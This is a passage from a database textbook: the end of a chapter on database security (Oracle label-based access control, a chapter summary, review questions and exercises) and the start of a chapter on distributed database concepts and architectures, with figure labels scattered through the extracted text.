Check Virtual Private
Database (VDP) Policy

Process and Execute
Data Request

Enforce Label-
Based Security

Oracle Data Server

Table Level
Privileges

Table

Data Rows
in Table

Label Security
Policies

Row Level
Access Control

VPD-Based
Control

User-Defined
VPD Policies

Figure 4
Oracle Label Security
architecture.

Source: Oracle (2007)

Groups are used to identify organizations as owners of the data with corresponding
group labels. Groups are hierarchical; for example, a group can be associated with a
parent group.

If a user has a maximum level of SENSITIVE, then the user potentially has access to
all data having levels SENSITIVE, CONFIDENTIAL, and UNCLASSIFIED. This user has
no access to HIGHLY_SENSITIVE data. Figure 5 shows how data labels and user labels
work together to provide access control in Oracle Label Security.

As shown in Figure 5, User 1 can access the rows 2, 3, and 4 because his maximum
level is HS (Highly_Sensitive). He has access to the FIN (Finance) compartment,
and his access to group WR (Western Region) hierarchically includes group
WR_SAL (WR Sales). He cannot access row 1 because he does not have the CHEM
(Chemical) compartment. It is important that a user has authorization for all com-
partments in a row’s data label to be able to access that row. Based on this example,
user 2 can access both rows 3 and 4, and has a maximum level of S, which is less than
the HS in row 2. So, although user 2 has access to the FIN compartment, he can only
access the group WR_SAL, and thus cannot acces row 1.

11 Summary
In this chapter we discussed several techniques for enforcing database system secu-
rity. We presented different threats to databases in terms of loss of integrity, avail-
ability, and confidentiality. We discussed the types of control measures to deal with
these problems: access control, inference control, flow control, and encryption. In

871

Database Security

User Labels

HS FIN : WR

S FIN : WR_SAL

Legend for Labels
HS = Highly sensitive
S = Sensitive
C = Confidential
U = Unclassified

Maximum
Access
Level

All compartments to which
the user has access

Minimum
Access Level

Required

All compartments to which
the user must have access

User Label

Data Label

Rows in Table Data Labels

Row 1

Row 2

Row 3

Row 4

S CHEM, FIN : WR

HS FIN : WR_SAL

U FIN

C FIN : WR_SAL

Figure 5
Data labels and user
labels in Oracle.

Source: Oracle (2007)

the introduction we covered various issues related to security including data sensi-
tivity and type of disclosures, providing security vs. precision in the result when a
user requests information, and the relationship between information security and
privacy.

Security enforcement deals with controlling access to the database system as a whole
and controlling authorization to access specific portions of a database. The former
is usually done by assigning accounts with passwords to users. The latter can be
accomplished by using a system of granting and revoking privileges to individual
accounts for accessing specific parts of the database. This approach is generally
referred to as discretionary access control (DAC). We presented some SQL com-
mands for granting and revoking privileges, and we illustrated their use with exam-
ples. Then we gave an overview of mandatory access control (MAC) mechanisms
that enforce multilevel security. These require the classifications of users and data
values into security classes and enforce the rules that prohibit flow of information
from higher to lower security levels. Some of the key concepts underlying the mul-
tilevel relational model, including filtering and polyinstantiation, were presented.
Role-based access control (RBAC) was introduced, which assigns privileges based
on roles that users play. We introduced the notion of role hierarchies, mutual exclu-
sion of roles, and row- and label-based security. We briefly discussed the problem of
controlling access to statistical databases to protect the privacy of individual infor-
mation while concurrently providing statistical access to populations of records. We
explained the main ideas behind the threat of SQL Injection, the methods in which
it can be induced, and the various types of risks associated with it. Then we gave an

872

Database Security

idea of the various ways SQL injection can be prevented. The issues related to flow
control and the problems associated with covert channels were discussed next, as
well as encryption and public-private key-based infrastructures. The idea of sym-
metric key algorithms and the use of the popular asymmetric key-based public key
infrastructure (PKI) scheme was explained. We also covered the concepts of digital
signatures and digital certificates. We highlighted the importance of privacy issues
and hinted at some privacy preservation techniques. We discussed a variety of chal-
lenges to security including data quality, intellectual property rights, and data sur-
vivability. We ended the chapter by introducing the implementation of security
policies by using a combination of label-based security and virtual private databases
in Oracle 11g.

Review Questions
1. Discuss what is meant by each of the following terms: database authoriza-

tion, access control, data encryption, privileged (system) account, database
audit, audit trail.

2. Which account is designated as the owner of a relation? What privileges does
the owner of a relation have?

3. How is the view mechanism used as an authorization mechanism?

4. Discuss the types of privileges at the account level and those at the relation
level.

5. What is meant by granting a privilege? What is meant by revoking a
privilege?

6. Discuss the system of propagation of privileges and the restraints imposed
by horizontal and vertical propagation limits.

7. List the types of privileges available in SQL.

8. What is the difference between discretionary and mandatory access control?

9. What are the typical security classifications? Discuss the simple security
property and the *-property, and explain the justification behind these rules
for enforcing multilevel security.

10. Describe the multilevel relational data model. Define the following terms:
apparent key, polyinstantiation, filtering.

11. What are the relative merits of using DAC or MAC?

12. What is role-based access control? In what ways is it superior to DAC and
MAC?

13. What are the two types of mutual exclusion in role-based access control?

14. What is meant by row-level access control?

15. What is label security? How does an administrator enforce it?

873

Database Security

16. What are the different types of SQL injection attacks?

17. What risks are associated with SQL injection attacks?

18. What preventive measures are possible against SQL injection attacks?

19. What is a statistical database? Discuss the problem of statistical database
security.

20. How is privacy related to statistical database security? What measures can be
taken to ensure some degree of privacy in statistical databases?

21. What is flow control as a security measure? What types of flow control exist?

22. What are covert channels? Give an example of a covert channel.

23. What is the goal of encryption? What process is involved in encrypting data
and then recovering it at the other end?

24. Give an example of an encryption algorithm and explain how it works.

25. Repeat the previous question for the popular RSA algorithm.

26. What is a symmetric key algorithm for key-based security?

27. What is the public key infrastructure scheme? How does it provide security?

28. What are digital signatures? How do they work?

29. What type of information does a digital certificate include?

Exercises
30. How can privacy of data be preserved in a database?

31. What are some of the current outstanding challenges for database security?

32. Consider the relational database schema in Figure A.1 (at the end of this
chapter). Suppose that all the relations were created by (and hence are
owned by) user X, who wants to grant the following privileges to user
accounts A, B, C, D, and E:

a. Account A can retrieve or modify any relation except DEPENDENT and
can grant any of these privileges to other users.

b. Account B can retrieve all the attributes of EMPLOYEE and DEPARTMENT
except for Salary, Mgr_ssn, and Mgr_start_date.

c. Account C can retrieve or modify WORKS_ON but can only retrieve the
Fname, Minit, Lname, and Ssn attributes of EMPLOYEE and the Pname and
Pnumber attributes of PROJECT.

d. Account D can retrieve any attribute of EMPLOYEE or DEPENDENT and
can modify DEPENDENT.

e. Account E can retrieve any attribute of EMPLOYEE but only for
EMPLOYEE tuples that have Dno = 3.

f. Write SQL statements to grant these privileges. Use views where
appropriate.

874

Database Security

33. Suppose that privilege (a) of Exercise 32 is to be given with GRANT OPTION
but only so that account A can grant it to at most five accounts, and each of
these accounts can propagate the privilege to other accounts but without the
GRANT OPTION privilege. What would the horizontal and vertical propaga-
tion limits be in this case?

34. Consider the relation shown in Figure 2(d). How would it appear to a user
with classification U? Suppose that a classification U user tries to update the
salary of ‘Smith’ to $50,000; what would be the result of this action?

Selected Bibliography
Authorization based on granting and revoking privileges was proposed for the
SYSTEM R experimental DBMS and is presented in Griffiths and Wade (1976).
Several books discuss security in databases and computer systems in general,
including the books by Leiss (1982a) and Fernandez et al. (1981), and Fugini et al.
(1995). Natan (2005) is a practical book on security and auditing implementation
issues in all major RDBMSs.

Many papers discuss different techniques for the design and protection of statistical
databases. They include McLeish (1989), Chin and Ozsoyoglu (1981), Leiss (1982),
Wong (1984), and Denning (1980). Ghosh (1984) discusses the use of statistical
databases for quality control. There are also many papers discussing cryptography
and data encryption, including Diffie and Hellman (1979), Rivest et al. (1978), Akl
(1983), Pfleeger and Pfleeger (2007), Omura et al. (1990), Stallings (2000), and Iyer
at al. (2004).

Halfond et al. (2006) helps understand the concepts of SQL injection attacks and
the various threats imposed by them. The white paper Oracle (2007a) explains how
Oracle is less prone to SQL injection attack as compared to SQL Server. It also gives
a brief explanation as to how these attacks can be prevented from occurring.
Further proposed frameworks are discussed in Boyd and Keromytis (2004), Halfond
and Orso (2005), and McClure and Krüger (2005).

Multilevel security is discussed in Jajodia and Sandhu (1991), Denning et al. (1987),
Smith and Winslett (1992), Stachour and Thuraisingham (1990), Lunt et al. (1990),
and Bertino et al. (2001). Overviews of research issues in database security are given
by Lunt and Fernandez (1990), Jajodia and Sandhu (1991), Bertino (1998), Castano
et al. (1995), and Thuraisingham et al. (2001). The effects of multilevel security on
concurrency control are discussed in Atluri et al. (1997). Security in next-generation,
semantic, and object-oriented databases is discussed in Rabbiti et al. (1991), Jajodia
and Kogan (1990), and Smith (1990). Oh (1999) presents a model for both discre-
tionary and mandatory security. Security models for Web-based applications and
role-based access control are discussed in Joshi et al. (2001). Security issues for man-
agers in the context of e-commerce applications and the need for risk assessment
models for selection of appropriate security control measures are discussed in

875

Database Security

Farahmand et al. (2005). Row-level access control is explained in detail in Oracle
(2007b) and Sybase (2005). The latter also provides details on role hierarchy and
mutual exclusion. Oracle (2009) explains how Oracle uses the concept of identity
management.

Recent advances as well as future challenges for security and privacy of databases are
discussed in Bertino and Sandhu (2005). U.S. Govt. (1978), OECD (1980), and NRC
(2003) are good references on the view of privacy by important government bodies.
Karat et al. (2009) discusses a policy framework for security and privacy. XML and
access control are discussed in Naedele (2003). More details can be found on privacy
preserving techniques in Vaidya and Clifton (2004), intellectual property rights in
Sion et al. (2004), and database survivability in Jajodia et al. (1999). Oracle’s VPD
technology and label-based security is discussed in more detail in Oracle (2007b).

DEPARTMENT

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

EMPLOYEE

DEPT_LOCATIONS

Dnumber Dlocation

PROJECT

Pname Pnumber Plocation Dnum

WORKS_ON

Essn Pno Hours

DEPENDENT

Essn Dependent_name Sex Bdate Relationship

Dname Dnumber Mgr_ssn Mgr_start_date

Figure A.1
Schema diagram for the
COMPANY relational
database schema.

876

Distributed Databases

In this chapter we direct our attention to distributeddatabases (DDBs), distributed database management
systems (DDBMSs), and how the client-server architecture is used as a platform for
database application development. Distributed databases bring the advantages of
distributed computing to the database management domain. A distributed com-
puting system consists of a number of processing elements, not necessarily homo-
geneous, that are interconnected by a computer network, and that cooperate in
performing certain assigned tasks. As a general goal, distributed computing systems
partition a big, unmanageable problem into smaller pieces and solve it efficiently in
a coordinated manner. The economic viability of this approach stems from two rea-
sons: more computing power is harnessed to solve a complex task, and each
autonomous processing element can be managed independently to develop its own
applications.

DDB technology resulted from a merger of two technologies: database technology,
and network and data communication technology. Computer networks allow dis-
tributed processing of data. Traditional databases, on the other hand, focus on pro-
viding centralized, controlled access to data. Distributed databases allow an
integration of information and its processing by applications that may themselves
be centralized or distributed.

Several distributed database prototype systems were developed in the 1980s to
address the issues of data distribution, distributed query and transaction process-
ing, distributed database metadata management, and other topics. However, a full-
scale comprehensive DDBMS that implements the functionality and techniques
proposed in DDB research never emerged as a commercially viable product. Most
major vendors redirected their efforts from developing a pure DDBMS product into
developing systems based on client-server concepts, or toward developing technolo-
gies for accessing distributed heterogeneous data sources.

From Chapter 25 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and
Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison-
Wesley. All rights reserved.

877

Distributed Databases

Organizations continue to be interested in the decentralization of processing (at the
system level) while achieving an integration of the information resources (at the log-
ical level) within their geographically distributed systems of databases, applications,
and users. There is now a general endorsement of the client-server approach to
application development, and the three-tier approach to Web applications develop-
ment.

In this chapter we discuss distributed databases, their architectural variations, and
concepts central to data distribution and the management of distributed data.
Details of the advances in communication technologies facilitating the develop-
ment of DDBs are outside the scope of this text; see the texts on data communica-
tions and networking listed in the Selected Bibliography at the end of this chapter.

Section 1 introduces distributed database management and related concepts.
Sections 2 and 3 introduce different types of distributed database systems and their
architectures, including federated and multidatabase systems. The problems of het-
erogeneity and the needs of autonomy in federated database systems are also high-
lighted. Detailed issues of distributed database design, involving fragmenting of
data and distributing it over multiple sites with possible replication, are discussed in
Section 4. Sections 5 and 6 introduce distributed database query and transaction
processing techniques, respectively. Section 7 gives an overview of the concurrency
control and recovery in distributed databases. Section 8 discusses catalog manage-
ment schemes in distributed databases. In Section 9, we briefly discuss current
trends in distributed databases such as cloud computing and peer-to-peer data-
bases. Section 10 discusses distributed database features of the Oracle RDBMS.
Section 11 summarizes the chapter.

For a short introduction to the topic of distributed databases, Sections 1, 2, and 3
may be covered.

1 Distributed Database Concepts1

We can define a distributed database (DDB) as a collection of multiple logically
interrelated databases distributed over a computer network, and a distributed data-
base management system (DDBMS) as a software system that manages a distrib-
uted database while making the distribution transparent to the user.2

Distributed databases are different from Internet Web files. Web pages are basically
a very large collection of files stored on different nodes in a network—the
Internet—with interrelationships among the files represented via hyperlinks. The
common functions of database management, including uniform query processing
and transaction processing, do not apply to this scenario yet. The technology is,
however, moving in a direction such that distributed World Wide Web (WWW)
databases will become a reality in the future. The proliferation of data at millions of

1The substantial contribution of Narasimhan Srinivasan to this and several other sections in this chapter
is appreciated.
2This definition and discussions in this section are based largely on Ozsu and Valduriez (1999).

878

Distributed Databases

Websites in various forms does not qualify as a DDB by the definition given earlier.

1.1 Differences between DDB and Multiprocessor Systems
We need to distinguish distributed databases from multiprocessor systems that use
shared storage (primary memory or disk). For a database to be called distributed,
the following minimum conditions should be satisfied:

■ Connection of database nodes over a computer network. There are multi-
ple computers, called sites or nodes. These sites must be connected by an
underlying communication network to transmit data and commands
among sites, as shown later in Figure 3(c).

■ Logical interrelation of the connected databases. It is essential that the
information in the databases be logically related.

■ Absence of homogeneity constraint among connected nodes. It is not nec-
essary that all nodes be identical in terms of data, hardware, and software.

The sites may all be located in physical proximity—say, within the same building or
a group of adjacent buildings—and connected via a local area network, or they may
be geographically distributed over large distances and connected via a long-haul or
wide area network. Local area networks typically use wireless hubs or cables,
whereas long-haul networks use telephone lines or satellites. It is also possible to use
a combination of networks.

Networks may have different topologies that define the direct communication
paths among sites. The type and topology of the network used may have a signifi-
cant impact on the performance and hence on the strategies for distributed query
processing and distributed database design. For high-level architectural issues, how-
ever, it does not matter what type of network is used; what matters is that each site
be able to communicate, directly or indirectly, with every other site. For the remain-
der of this chapter, we assume that some type of communication network exists
among sites, regardless of any particular topology. We will not address any network-
specific issues, although it is important to understand that for an efficient operation
of a distributed database system (DDBS), network design and performance issues
are critical and are an integral part of the overall solution. The details of the under-
lying communication network are invisible to the end user.

1.2 Transparency
The concept of transparency extends the general idea of hiding implementation
details from end users. A highly transparent system offers a lot of flexibility to the
end user/application developer since it requires little or no awareness of underlying
details on their part. In the case of a traditional centralized database, transparency
simply pertains to logical and physical data independence for application develop-
ers. However, in a DDB scenario, the data and software are distributed over multiple

879

Distributed Databases

sites connected by a computer network, so additional types of transparencies are
introduced.

Consider the company database in Figure A.1 in Appendix: Figures at the end of this
chapter. The EMPLOYEE, PROJECT, and WORKS_ON tables may be fragmented
horizontally (that is, into sets of rows, as we will discuss in Section 4) and stored
with possible replication as shown in Figure 1. The following types of transparen-
cies are possible:

■ Data organization transparency (also known as distribution or network
transparency). This refers to freedom for the user from the operational
details of the network and the placement of the data in the distributed sys-
tem. It may be divided into location transparency and naming transparency.
Location transparency refers to the fact that the command used to perform
a task is independent of the location of the data and the location of the node
where the command was issued. Naming transparency implies that once a
name is associated with an object, the named objects can be accessed unam-
biguously without additional specification as to where the data is located.

■ Replication transparency. As we show in Figure 1, copies of the same data
objects may be stored at multiple sites for better availability, perfor-mance,
and reliability. Replication transparency makes the user unaware of the exis-
tence of these copies.

■ Fragmentation transparency. Two types of fragmentation are possible.
Horizontal fragmentation distributes a relation (table) into subrelations

EMPLOYEES

PROJECTS
WORKS_ON

All

All
All

EMPLOYEES

PROJECTS

WORKS_ON

San Francisco
and Los Angeles

San Francisco

San Francisco
employees

EMPLOYEES

PROJECTS

WORKS_ON

Los Angeles

Los Angeles and
San Francisco

Los Angeles
employees

EMPLOYEES

PROJECTS

WORKS_ON

New York

All

New York
employees

EMPLOYEES

PROJECTS

WORKS_ON

Atlanta

Atlanta

Atlanta
employees

Chicago
(Headquarters)

New York

Los Angeles Atlanta

San Francisco

Communications
Network

Figure 1
Data distribution and replication
among distributed databases.

880

Distributed Databases

that are subsets of the tuples (rows) in the original relation. Vertical frag-
mentation distributes a relation into subrelations where each subrelation is
defined by a subset of the columns of the original relation. A global query by
the user must be transformed into several fragment queries. Fragmentation
transparency makes the user unaware of the existence of fragments.

■ Other transparencies include design transparency and execution trans-
parency—referring to freedom from knowing how the distributed database
is designed and where a transaction executes.

1.3 Autonomy
Autonomy determines the extent to which individual nodes or DBs in a connected
DDB can operate independently. A high degree of autonomy is desirable for
increased flexibility and customized maintenance of an individual node. Autonomy
can be applied to design, communication, and execution. Design autonomy refers
to independence of data model usage and transaction management techniques
among nodes. Communication autonomy determines the extent to which each
node can decide on sharing of information with other nodes. Execution autonomy
refers to independence of users to act as they please.

1.4 Reliability and Availability
Reliability and availability are two of the most common potential advantages cited
for distributed databases. Reliability is broadly defined as the probability that a sys-
tem is running (not down) at a certain time point, whereas availability is the prob-
ability that the system is continuously available during a time interval. We can
directly relate reliability and availability of the database to the faults, errors, and fail-
ures associated with it. A failure can be described as a deviation of a system’s behav-
ior from that which is specified in order to ensure correct execution of operations.
Errors constitute that subset of system states that causes the failure. Fault is the
cause of an error.

To construct a system that is reliable, we can adopt several approaches. One com-
mon approach stresses fault tolerance; it recognizes that faults will occur, and
designs mechanisms that can detect and remove faults before they can result in a
system failure. Another more stringent approach attempts to ensure that the final
system does not contain any faults. This is done through an exhaustive design
process followed by extensive quality control and testing. A reliable DDBMS toler-
ates failures of underlying components and processes user requests so long as data-
base consistency is not violated. A DDBMS recovery manager has to deal with
failures arising from transactions, hardware, and communication networks.
Hardware failures can either be those that result in loss of main memory contents or
loss of secondary storage contents. Communication failures occur due to errors
associated with messages and line failures. Message errors can include their loss,
corruption, or out-of-order arrival at destination.

881

Distributed Databases

1.5 Advantages of Distributed Databases
Organizations resort to distributed database management for various reasons.
Some important advantages are listed below.

1. Improved ease and flexibility of application development. Developing and
maintaining applications at geographically distributed sites of an organiza-
tion is facilitated owing to transparency of data distribution and control.

2. Increased reliability and availability. This is achieved by the isolation of
faults to their site of origin without affecting the other databases connected
to the network. When the data and DDBMS software are distributed over
several sites, one site may fail while other sites continue to operate. Only the
data and software that exist at the failed site cannot be accessed. This
improves both reliability and availability. Further improvement is achieved
by judiciously replicating data and software at more than one site. In a cen-
tralized system, failure at a single site makes the whole system unavailable to
all users. In a distributed database, some of the data may be unreachable, but
users may still be able to access other parts of the database. If the data in the
failed site had been replicated at another site prior to the failure, then the
user will not be affected at all.

3. Improved performance. A distributed DBMS fragments the database by
keeping the data closer to where it is needed most. Data localization reduces
the contention for CPU and I/O services and simultaneously reduces access
delays involved in wide area networks. When a large database is distributed
over multiple sites, smaller databases exist at each site. As a result, local
queries and transactions accessing data at a single site have better perfor-
mance because of the smaller local databases. In addition, each site has a
smaller number of transactions executing than if all transactions are submit-
ted to a single centralized database. Moreover, interquery and intraquery
parallelism can be achieved by executing multiple queries at different sites,
or by breaking up a query into a number of subqueries that execute in paral-
lel. This contributes to improved performance.

4. Easier expansion. In a distributed environment, expansion of the system in
terms of adding more data, increasing database sizes, or adding more proces-
sors is much easier.

The transparencies we discussed in Section 1.2 lead to a compromise between ease
of use and the overhead cost of providing transparency. Total transparency provides
the global user with a view of the entire DDBS as if it is a single centralized system.
Transparency is provided as a complement to autonomy, which gives the users
tighter control over local databases. Transparency features may be implemented as a
part of the user language, which may translate the required services into appropriate
operations. Additionally, transparency impacts the features that must be provided
by the operating system and the DBMS.

882

Distributed Databases

1.6 Additional Functions of Distributed Databases
Distribution leads to increased complexity in the system design and implementa-
tion. To achieve the potential advantages listed previously, the DDBMS software
must be able to provide the following functions in addition to those of a centralized
DBMS:

■ Keeping track of data distribution. The ability to keep track of the data dis-
tribution, fragmentation, and replication by expanding the DDBMS catalog.

■ Distributed query processing. The ability to access remote sites and trans-
mit queries and data among the various sites via a communication network.

■ Distributed transaction management. The ability to devise execution
strategies for queries and transactions that access data from more than one
site and to synchronize the access to distributed data and maintain the
integrity of the overall database.

■ Replicated data management. The ability to decide which copy of a repli-
cated data item to access and to maintain the consistency of copies of a repli-
cated data item.

■ Distributed database recovery. The ability to recover from individual site
crashes and from new types of failures, such as the failure of communication
links.

■ Security. Distributed transactions must be executed with the proper man-
agement of the security of the data and the authorization/access privileges of
users.

■ Distributed directory (catalog) management. A directory contains infor-
mation (metadata) about data in the database. The directory may be global
for the entire DDB, or local for each site. The placement and distribution of
the directory are design and policy issues.

These functions themselves increase the complexity of a DDBMS over a centralized
DBMS. Before we can realize the full potential advantages of distribution, we must
find satisfactory solutions to these design issues and problems. Including all this
additional functionality is hard to accomplish, and finding optimal solutions is a
step beyond that.

2 Types of Distributed Database Systems
The term distributed database management system can describe various systems that
differ from one another in many respects. The main thing that all such systems have
in common is the fact that data and software are distributed over multiple sites con-
nected by some form of communication network. In this section we discuss a num-
ber of types of DDBMSs and the criteria and factors that make some of these
systems different.

883

Distributed Databases

The first factor we consider is the degree of homogeneity of the DDBMS software.
If all servers (or individual local DBMSs) use identical software and all users
(clients) use identical software, the DDBMS is called homogeneous; otherwise, it is
called heterogeneous. Another factor related to the degree of homogeneity is the
degree of local autonomy. If there is no provision for the local site to function as a
standalone DBMS, then the system has no local autonomy. On the other hand, if
direct access by local transactions to a server is permitted, the system has some
degree of local autonomy.

Figure 2 shows classification of DDBMS alternatives along orthogonal axes of dis-
tribution, autonomy, and heterogeneity. For a centralized database, there is com-
plete autonomy, but a total lack of distribution and heterogeneity (Point A in the
figure). We see that the degree of local autonomy provides further ground for classi-
fication into federated and multidatabase systems. At one extreme of the autonomy
spectrum, we have a DDBMS that looks like a centralized DBMS to the user, with
zero autonomy (Point B). A single conceptual schema exists, and all access to the
system is obtained through a site that is part of the DDBMS—which means that no
local autonomy exists. Along the autonomy axis we encounter two types of
DDBMSs called federated database system (Point C) and multidatabase system
(Point D). In such systems, each server is an independent and autonomous central-
ized DBMS that has its own local users, local transactions, and DBA, and hence has

B

Distribution

Heterogeneity

Legend:

A: Traditional centralized database
systems

B: Pure distributed database systems

C: Federated database systems

D: Multidatabase or peer to peer
database systems

C D

A
Autonomy

Figure 2
Classification of dis-
tributed databases.

884

Distributed Databases

a very high degree of local autonomy. The term federated database system (FDBS)
is used when there is some global view or schema of the federation of databases that
is shared by the applications (Point C). On the other hand, a multidatabase system
has full local autonomy in that it does not have a global schema but interactively
constructs one as needed by the application (Point D).3 Both systems are hybrids
between distributed and centralized systems, and the distinction we made between
them is not strictly followed. We will refer to them as FDBSs in a generic sense. Point
D in the diagram may also stand for a system with full local autonomy and full het-
erogeneity—this could be a peer-to-peer database system (see Section 9.2). In a het-
erogeneous FDBS, one server may be a relational DBMS, another a network DBMS
(such as Computer Associates’ IDMS or HP’S IMAGE/3000), and a third an object
DBMS (such as Object Design’s ObjectStore) or hierarchical DBMS (such as IBM’s
IMS); in such a case, it is necessary to have a canonical system language and to
include language translators to translate subqueries from the canonical language to
the language of each server.

We briefly discuss the issues affecting the design of FDBSs next.

2.1 Federated Database Management Systems Issues
The type of heterogeneity present in FDBSs may arise from several sources. We dis-
cuss these sources first and then point out how the different types of autonomies
contribute to a semantic heterogeneity that must be resolved in a heterogeneous
FDBS.

■ Differences in data models. Databases in an organization come from a vari-
ety of data models, including the so-called legacy models (hierarchical and
network), the relational data model, the object data model, and even files.
The modeling capabilities of the models vary. Hence, to deal with them uni-
formly via a single global schema or to process them in a single language is
challenging. Even if two databases are both from the RDBMS environment,
the same information may be represented as an attribute name, as a relation
name, or as a value in different databases. This calls for an intelligent query-
processing mechanism that can relate information based on metadata.

■ Differences in constraints. Constraint facilities for specification and imple-
mentation vary from system to system. There are comparable features that
must be reconciled in the construction of a global schema. For example, the
relationships from ER models are represented as referential integrity con-
straints in the relational model. Triggers may have to be used to implement
certain constraints in the relational model. The global schema must also deal
with potential conflicts among constraints.

3The term multidatabase system is not easily applicable to most enterprise IT environments. The notion of
constructing a global schema as and when the need arises is not very feasible in practice for enterprise
databases.

885

Distributed Databases

■ Differences in query languages. Even with the same data model, the lan-
guages and their versions vary. For example, SQL has multiple versions like
SQL-89, SQL-92, SQL-99, and SQL:2008, and each system has its own set of
data types, comparison operators, string manipulation features, and so on.

Semantic Heterogeneity. Semantic heterogeneity occurs when there are differ-
ences in the meaning, interpretation, and intended use of the same or related data.
Semantic heterogeneity among component database systems (DBSs) creates the
biggest hurdle in designing global schemas of heterogeneous databases. The design
autonomy of component DBSs refers to their freedom of choosing the following
design parameters, which in turn affect the eventual complexity of the FDBS:

■ The universe of discourse from which the data is drawn. For example, for
two customer accounts, databases in the federation may be from the United
States and Japan and have entirely different sets of attributes about customer
accounts required by the accounting practices. Currency rate fluctuations
would also present a problem. Hence, relations in these two databases that
have identical names—CUSTOMER or ACCOUNT—may have some com-
mon and some entirely distinct information.

■ Representation and naming. The representation and naming of data ele-
ments and the structure of the data model may be prespecified for each local
database.

■ The understanding, meaning, and subjective interpretation of data. This is
a chief contributor to semantic heterogeneity.

■ Transaction and policy constraints. These deal with serializability criteria,
compensating transactions, and other transaction policies.

■ Derivation of summaries. Aggregation, summarization, and other data-
processing features and operations supported by the system.

The above problems related to semantic heterogeneity are being faced by all major
multinational and governmental organizations in all application areas. In today’s
commercial environment, most enterprises are resorting to heterogeneous FDBSs,
having heavily invested in the development of individual database systems using
diverse data models on different platforms over the last 20 to 30 years. Enterprises
are using various forms of software—typically called the middleware, or Web-
based packages called application servers (for example, WebLogic or WebSphere)
and even generic systems, called Enterprise Resource Planning (ERP) systems (for
example, SAP, J. D. Edwards ERP)—to manage the transport of queries and transac-
tions from the global application to individual databases (with possible additional
processing for business rules) and the data from the heterogeneous database servers
to the global application. Detailed discussion of these types of software systems is
outside the scope of this text.

Just as providing the ultimate transparency is the goal of any distributed database
architecture, local component databases strive to preserve autonomy.
Communication autonomy of a component DBS refers to its ability to decide
whether to communicate with another component DBS. Execution autonomy

886

Distributed Databases

refers to the ability of a component DBS to execute local operations without inter-
ference from external operations by other component DBSs and its ability to decide
the order in which to execute them. The association autonomy of a component
DBS implies that it has the ability to decide whether and how much to share its
functionality (operations it supports) and resources (data it manages) with other
component DBSs. The major challenge of designing FDBSs is to let component
DBSs interoperate while still providing the above types of autonomies to them.

3 Distributed Database Architectures
In this section, we first briefly point out the distinction between parallel and distrib-
uted database architectures. While both are prevalent in industry today, there are
various manifestations of the distributed architectures that are continuously evolv-
ing among large enterprises. The parallel architecture is more common in high-
performance computing, where there is a need for multiprocessor architectures to
cope with the volume of data undergoing transaction processing and warehousing
applications. We then introduce a generic architecture of a distributed database.
This is followed by discussions on the architecture of three-tier client-server and
federated database systems.

3.1 Parallel versus Distributed Architectures
There are two main types of multiprocessor system architectures that are common-
place:

■ Shared memory (tightly coupled) architecture. Multiple processors share
secondary (disk) storage and also share primary memory.

■ Shared disk (loosely coupled) architecture. Multiple processors share sec-
ondary (disk) storage but each has their own primary memory.

These architectures enable processors to communicate without the overhead of
exchanging messages over a network.4 Database management systems developed
using the above types of architectures are termed parallel database management
systems rather than DDBMSs, since they utilize parallel processor technology.
Another type of multiprocessor architecture is called shared nothing architecture.
In this architecture, every processor has its own primary and secondary (disk)
memory, no common memory exists, and the processors communicate over a high-
speed interconnection network (bus or switch). Although the shared nothing archi-
tecture resembles a distributed database computing environment, major differences
exist in the mode of operation. In shared nothing multiprocessor systems, there is
symmetry and homogeneity of nodes; this is not true of the distributed database
environment where heterogeneity of hardware and operating system at each node is
very common. Shared nothing architecture is also considered as an environment for

4If both primary and secondary memories are shared, the architecture is also known as shared everything
architecture.

887

Distributed Databases

parallel databases. Figure 3a illustrates a parallel database (shared nothing), whereas
Figure 3b illustrates a centralized database with distributed access and Figure 3c
shows a pure distributed database. We will not expand on parallel architectures and
related data management issues here.

(a)

(b)

Switch

CPU

Computer System 1

Memory

DB CPU

Computer System 2

Memory

DB

CPU

Memory

DB

Computer System n

Central Site
(Chicago)

Site
(New York)

Site
(Los Angeles)

Site
(Atlanta)

Site
(San Francisco)

DB1 DB2

Communications
Network

(c)
Site 5

Site 1

Site 2

Site 4

Site 3

Communications
Network

Figure 3
Some different database system architectures. (a) Shared nothing architecture.
(b) A networked architecture with a centralized database at one of the sites. (c)
A truly distributed database architecture.

888

Distributed Databases

User

Stored
Data

Global Conceptual Schema (GCS)

External
View

User

External
View

Local Conceptual Schema (LCS) Local Conceptual Schema (LCS)

Local Internal Schema (LIS) Local Internal Schema (LIS)

Stored
Data

Site 1 Site nSites 2 to n–1

Figure 4
Schema architecture of
distributed databases.

3.2 General Architecture of Pure Distributed Databases
In this section we discuss both the logical and component architectural models of a
DDB. In Figure 4, which describes the generic schema architecture of a DDB, the
enterprise is presented with a consistent, unified view showing the logical structure
of underlying data across all nodes. This view is represented by the global concep-
tual schema (GCS), which provides network transparency (see Section 1.2). To
accommodate potential heterogeneity in the DDB, each node is shown as having its
own local internal schema (LIS) based on physical organization details at that par-
ticular site. The logical organization of data at each site is specified by the local con-
ceptual schema (LCS). The GCS, LCS, and their underlying mappings provide the
fragmentation and replication transparency discussed in Section 1.2. Figure 5 shows
the component architecture of a DDB. The global query compiler references the
global conceptual schema from the global system catalog to verify and impose
defined constraints. The global query optimizer references both global and local
conceptual schemas and generates optimized local queries from global queries. It
evaluates all candidate strategies using a cost function that estimates cost based on
response time (CPU, I/O, and network latencies) and estimated sizes of intermedi-

889

Distributed Databases

User

Interactive Global Query

Stored
Data

Global Query Compiler

Global Query Optimizer

Global Transaction Manager

Local Transaction Manager

Local Query
Translation

and Execution

Local
System
Catalog

Stored
Data

Local Transaction Manager

Local Query
Translation

and Execution

Local
System
Catalog

Figure 5
Component architecture
of distributed databases.

ate results. The latter is particularly important in queries involving joins. Having
computed the cost for each candidate, the optimizer selects the candidate with the
minimum cost for execution. Each local DBMS would have their local query opti-
mizer, transaction manager, and execution engines as well as the local system cata-
log, which houses the local schemas. The global transaction manager is responsible
for coordinating the execution across multiple sites in conjunction with the local
transaction manager at those sites.

3.3 Federated Database Schema Architecture
Typical five-level schema architecture to support global applications in the FDBS
environment is shown in Figure 6. In this architecture, the local schema is the

890

External
schema

Federated
schema

. . .

. . .

. . .

. . .

. . .

Component
schema

Local
schema

Component
DBS

External
schema

External
schema

Federated
schema

Export
schema

Component
schema

Local
schema

Component
DBS

Export
schema

Export
schema

Distributed Databases

Figure 6
The five-level schema architecture
in a federated database system
(FDBS).

Source: Adapted from Sheth and
